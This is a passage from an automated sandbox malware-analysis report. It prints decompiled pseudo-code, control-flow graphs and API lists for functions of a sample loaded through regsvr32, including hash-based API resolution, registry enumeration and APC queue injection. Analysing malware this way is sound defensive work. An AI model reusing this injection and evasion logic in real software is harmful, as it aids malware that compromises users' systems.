                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF0D4 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E00007FFC7FFC130EF0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
				void* _t4;
				void* _t9;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t23;
				void* _t29;
				void* _t32;
				void* _t33;

				_t29 = __rdx;
				_t27 = __rcx;
				_t25 = __rbx;
				_t23 = __rax;
				_a8 = __rbx;
				GetLastError();
				_t11 =  *0x13123888; // 0x4
				if (_t11 == 0xffffffff) goto 0x130ef0fe;
				_t4 = E00007FFC7FFC130EF5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
				if (__rax != 0) goto 0x130ef13f;
				E00007FFC7FFC130EE26C(_t4, _t27, _t29);
				_t32 = _t23;
				if (_t23 != 0) goto 0x130ef11e;
				E00007FFC7FFC130EE114(_t23, _t27);
				goto 0x130ef15a;
				_t14 =  *0x13123888; // 0x4
				if (E00007FFC7FFC130EF614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x130ef117;
				E00007FFC7FFC130EEE40(_t32, _t23);
				_t9 = E00007FFC7FFC130EE114(_t23, _t32);
				if (_t32 == 0) goto 0x130ef15a;
				SetLastError(??);
				return _t9;
			}











                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0d4
                                0x7ffc130ef0de
                                0x7ffc130ef0e4
                                0x7ffc130ef0ef
                                0x7ffc130ef0f1
                                0x7ffc130ef0fc
                                0x7ffc130ef108
                                0x7ffc130ef10d
                                0x7ffc130ef113
                                0x7ffc130ef117
                                0x7ffc130ef11c
                                0x7ffc130ef11e
                                0x7ffc130ef131
                                0x7ffc130ef133
                                0x7ffc130ef13a
                                0x7ffc130ef142
                                0x7ffc130ef146
                                0x7ffc130ef159

                                APIs
                                • GetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF0DE
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF146
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF15C
                                • abort.LIBCMT ref: 00007FFC130EF162
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorLast$abort
                                • String ID:
                                • API String ID: 1447195878-0
                                • Opcode ID: 7a012ae045e6c987bb9a3b7d4f0e6a1a7c22592a596a8c6bb60e7afd6d044707
                                • Instruction ID: ce5543993cea57cd4835e1aa8729aae120ec9e7bb04bd31614269084bfa2f0fb
                                • Opcode Fuzzy Hash: 7a012ae045e6c987bb9a3b7d4f0e6a1a7c22592a596a8c6bb60e7afd6d044707
                                • Instruction Fuzzy Hash: 99019224B0AF6E42FA586774A55613821D18F487B8F25093CD91E267C2ED2CF869C230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640C5EE8 Relevance: 5.1, APIs: 4, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: FreeHeap$ErrorLast
                                • String ID:
                                • API String ID: 2332451156-0
                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: d10adf1a3fabbeb5f469c394372a043e78e5b5e1de6808fb2d2d51f08e062f9d
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 38214129201B74C3EB58DB66DD493A963A9EB89FC4F585015AF0D5379ECF36C492C304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Function 00735638 Relevance: 15.3, APIs: 10, Instructions: 252memoryCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 735638-735687 call 73908c 104 735691-7356a2 call 73908c 101->104 105 735689-73568f SleepEx 101->105 108 7356a4 104->108 109 7356ab-7356eb call 735ba4 call 7313ec 104->109 105->104 108->109 114 7356f1-735706 call 73908c 109->114 115 7359e0-7359f9 109->115 118 735711 114->118 119 735708-73570f 114->119 120 735713-735722 call 73908c 118->120 119->120 124 735724-73572c 120->124 125 73572e 120->125 126 735731-735747 HeapAlloc 124->126 125->126 128 7359d2-7359da HeapFree 126->128 129 73574d-73576b call 7347b0 126->129 128->115 132 7357a3-7357b3 call 73a238 129->132 133 73576d-735774 129->133 137 7357b8-7357ba 132->137 133->132 134 735776-73579e call 7347b0 * 2 133->134 134->132 139 7357c0-7357e1 call 73908c 137->139 140 7359c4-7359cc HeapFree 137->140 144 7357e3-7357e8 139->144 145 7357ea 139->145 140->128 146 7357ec-73580b HeapAlloc 144->146 145->146 148 735811-73584c call 735ba4 call 7313ec 146->148 149 7359b6 146->149 155 735852-735893 call 73b158 HeapFree 148->155 156 7359a8-7359b0 HeapFree 148->156 150 7359b9-7359be HeapFree 149->150 150->140 159 7359fa-7359ff 155->159 160 735899-7358a2 155->160 156->149 159->140 160->159 161 7358a8-7358c7 call 737cf4 160->161 161->156 164 7358cd-7358ee HeapAlloc 161->164 165 7359a3 164->165 166 7358f4-735931 call 735ba4 call 7313ec 164->166 165->156 171 735933-735993 call 73b158 * 2 166->171 172 735995-73599d HeapFree 166->172 171->150 172->165
                                C-Code - Quality: 31%
                                			E00735638(void* __ebx, void* __ecx, void* __ebp, long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r9, void* __r11) {
				void* __rbp;
				signed long long _t87;
				void* _t102;
				intOrPtr _t105;
				signed long long _t108;
				signed long long _t122;
				signed long long _t131;
				void* _t137;
				intOrPtr _t138;
				void* _t139;
				intOrPtr _t140;
				intOrPtr _t164;
				void* _t165;
				void* _t186;
				long long _t187;
				long long _t189;
				long long _t191;
				long long* _t193;
				long long _t231;
				void* _t236;
				long long _t245;
				long long _t246;
				void* _t247;
				void* _t248;
				void* _t263;
				void* _t268;
				long long _t271;
				void* _t272;
				long long _t274;

				_t268 = __r11;
				_t263 = __r9;
				_t191 = __rbx;
				_t165 = __ebp;
				_t139 = __ecx;
				_t137 = __ebx;
				_t186 = _t247;
				 *((long long*)(_t186 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
				 *((long long*)(_t186 + 0x18)) = __r8;
				 *((long long*)(_t186 + 8)) = __rcx;
				_push(_t236);
				_push(_t272);
				_t248 = _t247 - 0x50;
				_t243 =  *0x73d458;
				_t187 =  *0x73d448;
				 *((long long*)(_t248 + 0x38)) = _t187;
				_t164 = 0;
				E0073908C(0x38e683e4, _t187,  *((intOrPtr*)( *0x73d458 + 0x18)));
				if(_t187 != _t236) {
					_t9 = _t236 + 0xa; // 0xa, executed
					_t139 = _t9;
					SleepEx(??, ??); // executed
				}
				E0073908C(0x9c66d81c, _t187,  *((intOrPtr*)(_t243 + 0x18)));
				if(_t187 != _t236) {
					 *_t187();
				}
				_t12 = _t248 + 0x30; // -126
				_t87 = E00735BA4(_t12);
				_t13 = _t248 + 0x30; // -126
				r11d = _t87;
				r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
				_t18 = _t268 + 3; // 0x3
				E007313EC(_t137, _t139, _t18, _t187, _t191, _t13);
				 *((long long*)(_t248 + 0x40)) = _t187;
				if(_t187 == _t236) {
					L34:
					return _t164;
				} else {
					r12d = 0xfb849f8f;
					E0073908C(r12d, _t187,  *((intOrPtr*)(_t243 + 0x18)));
					if(_t187 == _t236) {
						_t138 = _t164;
					} else {
						_t138 =  *_t187();
					}
					E0073908C(r12d, _t187,  *((intOrPtr*)(_t243 + 0x18)));
					if(_t187 == _t236) {
						r13d = _t164;
					} else {
						r13d =  *_t187();
					}
					_t23 = _t191 + 7; // 0x7
					r8d = _t272 + _t23;
					HeapAlloc(??, ??, ??);
					_t271 = _t187;
					if(_t187 == _t236) {
						L33:
						HeapFree();
						goto L34;
					} else {
						_t24 = _t191 + 1; // 0x1
						r8d = _t24;
						L007347B0();
						if( *((intOrPtr*)(_t248 + 0xa0)) != _t236) {
							_t173 =  *((intOrPtr*)(_t248 + 0xa8)) - _t164;
							if( *((intOrPtr*)(_t248 + 0xa8)) != _t164) {
								_t187 =  *((intOrPtr*)(_t248 + 0x38));
								r8d = 6;
								L007347B0();
								_t32 = _t272 + 1; // 0x1
								r8d = _t32;
								L007347B0();
							}
						}
						_t231 = _t271; // executed
						_t102 = E0073A238(_t139, _t165, _t173, _t191,  *((intOrPtr*)(_t248 + 0x90)), _t231, _t248 + 0x48, _t263); // executed
						if(_t102 != _t164) {
							L32:
							HeapFree();
							goto L33;
						} else {
							_t193 =  *((intOrPtr*)(_t248 + 0xb0));
							 *_t193 =  *((intOrPtr*)(_t248 + 0x48));
							E0073908C(0xfb849f8f, _t187,  *((intOrPtr*)(_t243 + 0x18)));
							if(_t187 == _t236) {
								_t105 = _t164;
							} else {
								_t105 =  *_t187();
							}
							 *((intOrPtr*)(_t193 + 0x10)) = _t105;
							_t41 = _t231 + 0x34; // 0x34
							r8d = _t41;
							 *((intOrPtr*)(_t193 + 0x14)) = 1;
							HeapAlloc(??, ??, ??);
							_t274 = _t187;
							if(_t187 == _t236) {
								L30:
								goto L31;
							} else {
								_t43 = _t248 + 0x30; // 0xfb849fcf
								_t108 = E00735BA4(_t43);
								_t44 = _t248 + 0x30; // 0xfb849fcf
								r11d = _t108;
								r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
								_t49 = _t268 + 3; // 0x3
								E007313EC(_t138, _t139, _t49, _t187, _t193, _t44);
								_t245 = _t187;
								if(_t187 == _t236) {
									L29:
									__eflags = 0;
									HeapFree(??, ??, ??);
									goto L30;
								}
								L0073B158();
								HeapFree(??, ??, ??);
								_t232 =  *((intOrPtr*)(_t248 + 0xa0));
								 *((long long*)(_t193 + 8)) = _t274;
								if( *((intOrPtr*)(_t248 + 0xa0)) == _t236) {
									L35:
									_t164 = 1;
									goto L32;
								}
								_t140 =  *((intOrPtr*)(_t248 + 0xa8));
								if(_t140 == _t164) {
									goto L35;
								}
								r8d = _t140;
								_t189 = _t193 + 0x28;
								 *((long long*)(_t248 + 0x20)) = _t189;
								if(E00737CF4(_t138, _t189, _t193,  *((intOrPtr*)(_t248 + 0x90)), _t232, _t245, _t193 + 0x18) != _t164) {
									goto L29;
								}
								r15d = 0x77;
								 *((intOrPtr*)(_t193 + 0x2c)) = 1;
								HeapAlloc(??, ??, ??);
								_t246 = _t189;
								if(_t189 == _t236) {
									L28:
									goto L29;
								}
								_t62 = _t248 + 0x30; // 0xfb849fcf
								_t122 = E00735BA4(_t62);
								_t63 = _t248 + 0x30; // 0xfb849fcf
								r11d = _t122;
								r11d = r11d - ((r11d - (0x24924925 * r11d >> 0x20) >> 1) + (0x24924925 * r11d >> 0x20) >> 2) * 7;
								_t68 = _t268 + 3; // 0x3
								_t131 = E007313EC(_t138, _t140, _t68, _t189, _t193, _t63);
								 *((long long*)(_t248 + 0x48)) = _t189;
								if(_t189 == _t236) {
									__eflags = 0;
									HeapFree(??, ??, ??);
									goto L28;
								}
								L0073B158();
								r11d = _t131;
								r15d = r15d - r11d;
								 *((long long*)(_t248 + 0x20)) =  *((intOrPtr*)(_t248 + 0x38)) + 0x74129f;
								L0073B158();
								 *((long long*)(_t193 + 0x20)) = _t246;
								_t164 = 2;
								L31:
								HeapFree();
								goto L32;
							}
						}
					}
				}
			}
































                                0x00735638
                                0x00735638
                                0x00735638
                                0x00735638
                                0x00735638
                                0x00735638
                                0x00735638
                                0x0073563b
                                0x0073563f
                                0x00735643
                                0x00735647
                                0x0073564d
                                0x00735650
                                0x00735656
                                0x0073565a
                                0x00735661
                                0x00735678
                                0x0073567d
                                0x0073567f
                                0x00735687
                                0x0073568c
                                0x0073568c
                                0x0073568f
                                0x0073568f
                                0x0073569a
                                0x007356a2
                                0x007356a9
                                0x007356a9
                                0x007356ab
                                0x007356b0
                                0x007356b5
                                0x007356ba
                                0x007356d4
                                0x007356d7
                                0x007356db
                                0x007356e3
                                0x007356eb
                                0x007359e0
                                0x007359f9
                                0x007356f1
                                0x007356f5
                                0x007356fe
                                0x00735706
                                0x00735711
                                0x00735708
                                0x0073570d
                                0x0073570d
                                0x0073571a
                                0x00735722
                                0x0073572e
                                0x00735724
                                0x00735729
                                0x00735729
                                0x00735731
                                0x00735731
                                0x0073573b
                                0x00735741
                                0x00735747
                                0x007359d2
                                0x007359da
                                0x00000000
                                0x0073574d
                                0x0073574d
                                0x0073574d
                                0x00735757
                                0x0073576b
                                0x0073576d
                                0x00735774
                                0x00735776
                                0x0073577b
                                0x0073578d
                                0x00735792
                                0x00735792
                                0x0073579e
                                0x0073579e
                                0x00735774
                                0x007357b0
                                0x007357b3
                                0x007357ba
                                0x007359c4
                                0x007359cc
                                0x00000000
                                0x007357c0
                                0x007357c0
                                0x007357d2
                                0x007357d9
                                0x007357e1
                                0x007357ea
                                0x007357e3
                                0x007357e6
                                0x007357e6
                                0x007357f1
                                0x007357f4
                                0x007357f4
                                0x007357f8
                                0x007357ff
                                0x00735805
                                0x0073580b
                                0x007359b6
                                0x00000000
                                0x00735811
                                0x00735811
                                0x00735816
                                0x0073581b
                                0x00735820
                                0x0073583a
                                0x0073583d
                                0x00735841
                                0x00735846
                                0x0073584c
                                0x007359a8
                                0x007359ab
                                0x007359b0
                                0x00000000
                                0x007359b0
                                0x00735871
                                0x0073587e
                                0x00735884
                                0x0073588c
                                0x00735893
                                0x007359fa
                                0x007359fa
                                0x00000000
                                0x007359fa
                                0x00735899
                                0x007358a2
                                0x00000000
                                0x00000000
                                0x007358a8
                                0x007358b3
                                0x007358bb
                                0x007358c7
                                0x00000000
                                0x00000000
                                0x007358cd
                                0x007358db
                                0x007358e2
                                0x007358e8
                                0x007358ee
                                0x007359a3
                                0x00000000
                                0x007359a3
                                0x007358f4
                                0x007358f9
                                0x007358fe
                                0x00735903
                                0x0073591d
                                0x00735920
                                0x00735924
                                0x00735929
                                0x00735931
                                0x00735998
                                0x0073599d
                                0x00000000
                                0x0073599d
                                0x00735950
                                0x0073595d
                                0x00735968
                                0x00735970
                                0x00735980
                                0x0073598a
                                0x0073598e
                                0x007359b9
                                0x007359be
                                0x00000000
                                0x007359be
                                0x0073580b
                                0x007357ba
                                0x00735747

                                APIs
                                  • Part of subcall function 0073908C: SetLastError.KERNEL32 ref: 007390C8
                                • SleepEx.KERNEL32(00000000,00735217), ref: 0073568F
                                  • Part of subcall function 007313EC: HeapAlloc.KERNEL32 ref: 00731456
                                • HeapAlloc.KERNEL32 ref: 0073573B
                                • HeapAlloc.KERNEL32 ref: 007357FF
                                • HeapFree.KERNEL32 ref: 0073587E
                                  • Part of subcall function 00737CF4: HeapAlloc.KERNEL32 ref: 00737DB2
                                • HeapAlloc.KERNEL32 ref: 007358E2
                                • HeapFree.KERNEL32 ref: 0073599D
                                • HeapFree.KERNEL32 ref: 007359B0
                                • HeapFree.KERNEL32 ref: 007359BE
                                • HeapFree.KERNEL32 ref: 007359CC
                                • HeapFree.KERNEL32 ref: 007359DA
                                Memory Dump Source
                                • Source File: 00000003.00000002.640704180.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLastSleep
                                • String ID:
                                • API String ID: 3047968389-0
                                • Opcode ID: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction ID: 293b833d30d8b75fb84d702ee1fe12be6bd115982360f7b3260a7d42940c6340
                                • Opcode Fuzzy Hash: 8a526f4b4f4539653de5a656a5e2567e36e45d16e14d605094fa57f0b70ba07b
                                • Instruction Fuzzy Hash: 0B91AF36314E80C6EB15DB26E94439AA7A2F7C9FC4F448512AE4E87B19DF3CDA46C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 007337E0 Relevance: 12.3, APIs: 8, Instructions: 333memoryregistryinjectionCOMMONCrypto
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 177 7337e0-733845 GetModuleHandleA call 7340f8 180 733847-733858 call 73908c 177->180 181 7338bf-7338c2 177->181 188 733866 180->188 189 73385a-733864 180->189 183 733cc0-733cd5 181->183 184 7338c8-7338e1 HeapAlloc 181->184 186 7338e7-733905 call 73487a call 73908c 184->186 187 733cbb 184->187 199 733907 186->199 200 73390d-73394c call 73638c call 73908c 186->200 187->183 191 733869-73387a call 7340f8 188->191 189->191 191->181 198 73387c-733892 call 735fc8 191->198 198->181 205 733894-7338aa call 735fc8 198->205 199->200 210 73395e 200->210 211 73394e-73395c 200->211 205->181 212 7338ac-7338b8 call 735fc8 205->212 213 733961-733968 210->213 211->213 220 7338bd 212->220 216 73396a-73397b call 73908c 213->216 217 73398e-7339b6 HeapAlloc 213->217 225 733984-733989 216->225 226 73397d-73397f 216->226 218 733a8e 217->218 219 7339bc-7339d0 call 73908c 217->219 224 733a93-733a99 218->224 233 7339d2-7339f9 RegOpenKeyW 219->233 234 7339fb 219->234 220->181 228 733cb1-733cb9 call 736ce4 224->228 229 733a9f-733ae9 call 7347b0 call 73a0ac 224->229 231 733cac-733caf 225->231 240 733caa 226->240 228->183 245 733b05-733b08 229->245 246 733aeb-733b03 call 73a0ac 229->246 231->183 231->228 238 7339fe-733a00 233->238 234->238 241 733a02-733a13 call 73908c 238->241 242 733a7e-733a8c HeapFree 238->242 240->231 250 733a30 241->250 251 733a15-733a2e RegEnumKeyW 241->251 242->224 245->228 249 733b0e-733b1f call 735058 245->249 246->245 261 733b21-733b35 call 73405c 249->261 262 733b4b-733b4e 249->262 252 733a33-733a35 250->252 251->252 255 733a37-733a4a call 736644 252->255 256 733a4c-733a52 252->256 255->241 255->256 259 733a54-733a5b 256->259 260 733a5d-733a6e call 73908c 256->260 259->260 271 733a70-733a78 RegCloseKey 260->271 272 733a7a-733a7c 260->272 261->262 273 733b37-733b47 call 73405c 261->273 262->228 263 733b54-733b5f call 73a7a0 262->263 274 733b61-733b66 263->274 275 733b6b-733b99 263->275 271->272 272->224 272->242 273->262 274->228 278 733b9b-733ba3 275->278 279 733baf 275->279 280 733bb2-733bb5 278->280 281 733ba5-733bad call 734d70 278->281 279->280 283 733bc1-733bd6 call 73a8e8 280->283 284 733bb7-733bbc 280->284 281->280 283->284 288 733bd8-733bf4 call 73908c 283->288 284->228 291 733bf6-733bfa 288->291 292 733bfc 288->292 293 733bff-733c07 291->293 292->293 295 733c9d-733ca5 call 739d6c 293->295 296 733c0d-733c1e call 73908c 293->296 295->240 300 733c20-733c24 296->300 301 733c26 296->301 302 733c29-733c3a call 73908c 300->302 301->302 306 733c4b 302->306 307 733c3c-733c49 302->307 308 733c4e-733c55 306->308 307->308 310 733c57-733c64 call 73908c 308->310 311 733c6f-733c7c call 73908c 308->311 310->226 316 733c6a-733c6d 310->316 317 733c8f 311->317 318 733c7e-733c8d QueueUserAPC 311->318 316->231 319 733c92-733c95 317->319 318->319 319->183 320 733c97-733c9b 319->320 320->310
                                C-Code - Quality: 45%
                                			E007337E0(void* __ecx, void* __edx, void* __edi, long long* __rax, long long __rcx, void* __r8, void* __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t80;
				long _t88;
				long _t89;
				void* _t90;
				long _t94;
				long _t98;
				long _t112;
				long _t113;
				long _t114;
				long _t119;
				long _t120;
				long _t121;
				long _t122;
				void* _t126;
				signed int _t135;
				void* _t151;
				void* _t152;
				long long _t153;
				long _t154;
				long long* _t167;
				long long* _t168;
				intOrPtr _t169;
				void* _t170;
				intOrPtr _t192;
				long long _t219;
				intOrPtr _t221;
				intOrPtr _t224;
				intOrPtr _t226;
				long long* _t227;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				void* _t237;
				long long _t239;
				void* _t240;
				long long* _t244;
				long long _t246;
				void* _t247;
				CHAR* _t252;

				_t238 = __r10;
				_t237 = __r9;
				_t231 = __r8;
				_t167 = __rax;
				_t151 = __edi;
				_t126 = __ecx;
				 *((long long*)(_t228 + 8)) = __rcx;
				_push(_t170);
				_t229 = _t228 - 0x248;
				_t242 =  *0x73d448;
				_t221 =  *0x73d458;
				_t224 =  *((intOrPtr*)(_t221 + 8));
				 *((long long*)(_t229 + 0x20)) =  *0x73d448;
				 *(_t229 + 0x298) =  *0x73d450;
				GetModuleHandleA(_t252);
				_t215 = _t221 + 0x18;
				_t80 = E007340F8(__rax, _t221 + 0x18, __r8, __r10, _t247, _t244);
				r13d = 0;
				_t124 = _t80;
				if(_t80 == r13d) {
					E0073908C(0xa30cd0f3, _t167,  *((intOrPtr*)(_t221 + 0x18)));
					if(_t167 == _t244) {
						_t167 = _t244;
					} else {
						 *_t167();
					}
					_t215 = _t221 + 0x10;
					_t119 = E007340F8(_t167, _t221 + 0x10, _t231, _t238);
					_t124 = _t119;
					if(_t119 == r13d) {
						_t215 = _t221 + 0x28;
						_t120 = E00735FC8(_t124, _t167, _t170, _t242 + 0x741082, _t221 + 0x28, _t221, _t224, _t238); // executed
						_t124 = _t120;
						if(_t120 == r13d) {
							_t215 = _t221 + 0x20;
							_t121 = E00735FC8(_t124, _t167, _t170, _t242 + 0x741079, _t221 + 0x20, _t221, _t224, _t238); // executed
							_t124 = _t121;
							if(_t121 == r13d) {
								_t215 = _t221 + 0x30;
								_t122 = E00735FC8(_t124, _t167, _t170, _t242 + 0x741092, _t221 + 0x30, _t221, _t224, _t238); // executed
								_t124 = _t122;
							}
						}
					}
				}
				if(_t124 != r13d) {
					L76:
					return _t124;
				}
				HeapAlloc();
				_t219 = _t167;
				if(_t167 == _t244) {
					_t124 = 8;
					goto L76;
				}
				_t233 = _t170;
				E0073487A();
				E0073908C(0x9ffc4c27, _t167,  *((intOrPtr*)(_t221 + 0x10)));
				if(_t167 != _t244) {
					 *_t167();
				}
				_t24 = _t219 + 0xa8; // 0xa8
				_t168 = _t24;
				 *_t168 = _t168;
				 *((long long*)(_t219 + 0xb0)) = _t168;
				 *(_t219 + 0x9c) = r13d;
				 *(_t219 + 0xa0) = r13d;
				 *(_t219 + 0x98) = r13d;
				E0073638C(_t126, _t168, _t170, _t221);
				E0073908C(0xdc444c2b, _t168,  *((intOrPtr*)(_t221 + 0x18)));
				if(_t168 == _t244) {
					_t168 = _t244;
				} else {
					r9d = 0;
					r8d = 0;
					_t126 = 0;
					 *_t168();
				}
				 *((long long*)(_t219 + 0x28)) = _t168;
				if(_t168 != _t244) {
					_t250 =  *0x73d458;
					r8d = 0x1102;
					HeapAlloc(??, ??, ??);
					_t153 = 0;
					_t246 = _t168;
					_t34 = _t224 + 0x7f; // 0x7f
					r12d = _t34;
					__eflags = _t168 - _t224;
					if(_t168 == _t224) {
						_t124 = 8;
						L36:
						r13d = 0;
						__eflags = _t124 - r13d;
						if(_t124 != r13d) {
							goto L74;
						}
						_t226 =  *0x73d448;
						_t47 = _t246 + 8; // 0x8
						r8d = _t47;
						L007347B0();
						_t215 = _t229 + 0x2a0;
						_t234 = 0x730000 + _t226 + 0x11188;
						 *((intOrPtr*)(_t229 + 0x2a6)) = r13w;
						_t88 = E0073A0AC(_t124, _t126, _t170, _t219, _t229 + 0x2a0, _t219, _t221, _t226, _t234); // executed
						_t124 = _t88;
						__eflags = _t88 - r13d;
						if(_t88 != r13d) {
							_t234 = 0x730000 + _t226 + 0x111e0;
							_t215 = _t229 + 0x2a0;
							_t124 = E0073A0AC(_t124, _t126, _t170, _t219, _t229 + 0x2a0, _t219, _t221, _t226, _t234);
						}
						__eflags = _t124 - r13d;
						if(__eflags == 0) {
							_t57 = _t219 + 8; // 0x8
							_t215 = _t57;
							_t89 = E00735058(_t126, __eflags, _t168, _t170, _t219, _t215, _t221, _t226, _t234, _t238);
							_t124 = _t89;
							__eflags = _t89 - r13d;
							if(_t89 == r13d) {
								_t124 = 8;
								E0073405C(_t170, _t219, _t215, _t219, _t221, _t226);
								 *((long long*)(_t219 + 0x30)) = _t168;
								__eflags = _t168 - _t246;
								if(_t168 != _t246) {
									_t59 = _t219 + 8; // 0x8
									E0073405C(_t170, _t59, _t215, _t219, _t221, _t226);
									__eflags = _t168 - _t246;
									 *((long long*)(_t219 + 0x38)) = _t168;
									_t124 =  !=  ? r13d : 8;
								}
							}
							__eflags = _t124 - r13d;
							if(_t124 == r13d) {
								_t90 = E0073A7A0(_t151, _t168, _t170, _t219, _t215, _t237); // executed
								__eflags = _t90 - r13d;
								if(_t90 != r13d) {
									_t169 =  *((intOrPtr*)(_t229 + 0x20));
									r9d =  *(_t229 + 0x298);
									_t239 = _t169 + 0x73f000;
									r8d =  *(_t239 + 2) & 0x0000ffff;
									_t135 = r9d ^ 0xe49a1e6d;
									__eflags = _t169 - _t234 + 8;
									if(_t169 <= _t234 + 8) {
										_t168 = _t246;
									} else {
										_t168 = _t234 + _t239 + 8;
										__eflags = _t135 - r13d;
										if(_t135 != r13d) {
											E00734D70(_t135, _t168);
										}
									}
									__eflags = _t168 - _t246;
									if(_t168 != _t246) {
										r9d = r9d ^ 0xecb028fc;
										E0073A8E8(r9d, _t168, _t239, _t237);
										__eflags = _t168 - _t246;
										if(_t168 == _t246) {
											goto L51;
										}
										 *((long long*)(_t219 + 0x40)) = _t239;
										 *0x73d440 = _t219;
										E0073908C(0xa30cd0f3, _t168,  *((intOrPtr*)(_t221 + 0x18)));
										__eflags = _t168 - _t246;
										if(_t168 == _t246) {
											_t168 = _t246;
										} else {
											_t126 = 0;
											 *_t168();
										}
										__eflags = _t168 -  *((intOrPtr*)(_t229 + 0x290));
										if(_t168 ==  *((intOrPtr*)(_t229 + 0x290))) {
											asm("lock add dword [esi+0x38], 0x1");
											_t94 = E00739D6C(_t124, _t126, 0xa30cd0f3, _t152, _t170, _t219, _t234, _t237, _t239, _t240);
											goto L72;
										} else {
											E0073908C(0x9f72cbe0, _t168,  *((intOrPtr*)(_t221 + 0x18)));
											__eflags = _t168 - _t246;
											if(_t168 == _t246) {
												_t154 = r13d;
											} else {
												_t154 =  *_t168();
											}
											E0073908C(0xaade337c, _t168,  *((intOrPtr*)(_t221 + 0x18)));
											__eflags = _t168 - _t246;
											if(_t168 == _t246) {
												_t227 = _t246;
											} else {
												r8d = _t154;
												_t74 = _t215 + 0x10; // 0x10
												_t126 = _t74;
												 *_t168();
												_t227 = _t168;
											}
											_t192 =  *((intOrPtr*)(_t221 + 0x18));
											__eflags = _t227 - _t246;
											if(_t227 != _t246) {
												E0073908C(0x1c8cff93, _t168, _t192);
												__eflags = _t168 - _t246;
												if(_t168 == _t246) {
													_t98 = r13d;
												} else {
													_t215 = _t227; // executed
													_t98 = QueueUserAPC(??, ??, ??); // executed
												}
												__eflags = _t98 - r13d;
												if(_t98 != r13d) {
													goto L76;
												} else {
													_t192 =  *((intOrPtr*)(_t221 + 0x18));
													goto L64;
												}
											} else {
												L64:
												E0073908C(0xc06f8334, _t168, _t192);
												__eflags = _t168 - _t246;
												if(_t168 != _t246) {
													goto L17;
												}
												_t124 = r12d;
												goto L73;
											}
										}
									} else {
										L51:
										_t124 = 2;
										goto L74;
									}
								}
								_t124 = 0xb7;
							}
						}
						goto L74;
					}
					 *_t168 = 0;
					E0073908C(0x3d06c463, _t168,  *((intOrPtr*)(_t250 + 0x20)));
					__eflags = _t168 - _t224;
					if(_t168 == _t224) {
						_t124 = r12d;
					} else {
						_t233 = _t229 + 0x2a8;
						_t215 =  *((intOrPtr*)(_t229 + 0x20)) + 0x7410a0;
						_t114 = RegOpenKeyW(??, ??, ??); // executed
						_t124 = _t114;
					}
					__eflags = _t124 - _t153;
					if(_t124 != _t153) {
						L34:
						HeapFree();
						goto L36;
					} else {
						while(1) {
							E0073908C(0xdf514773, _t168,  *((intOrPtr*)(_t250 + 0x20)));
							__eflags = _t168;
							if(_t168 == 0) {
								_t124 = r12d;
							} else {
								_t233 = _t229 + 0x30;
								r9d = 0x104;
								_t113 = RegEnumKeyW(??, ??, ??, ??); // executed
								_t124 = _t113;
							}
							__eflags = _t124;
							if(_t124 != 0) {
								break;
							}
							_t215 = _t229 + 0x30;
